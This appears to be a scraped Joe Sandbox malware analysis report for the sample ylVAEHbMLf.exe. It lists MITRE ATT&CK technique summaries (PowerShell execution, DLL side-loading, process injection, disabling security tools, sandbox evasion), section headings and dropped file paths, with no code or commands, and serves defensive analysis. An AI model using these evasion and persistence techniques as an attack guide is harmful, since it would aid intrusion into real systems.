Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ylVAEHbMLf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4r1h5sgd.ykz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vq0xx0a.iij.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmqbykxu.pgm.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eymdjyc1.abr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbjjoq4b.rpe.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfzibsx3.xyg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5qmnddi.kvm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1zkfp5t.vkr.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_md4nxhqm.jbz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfctb52a.40a.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_og042ud3.2x3.ps1

Windows Analysis Report
ylVAEHbMLf.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre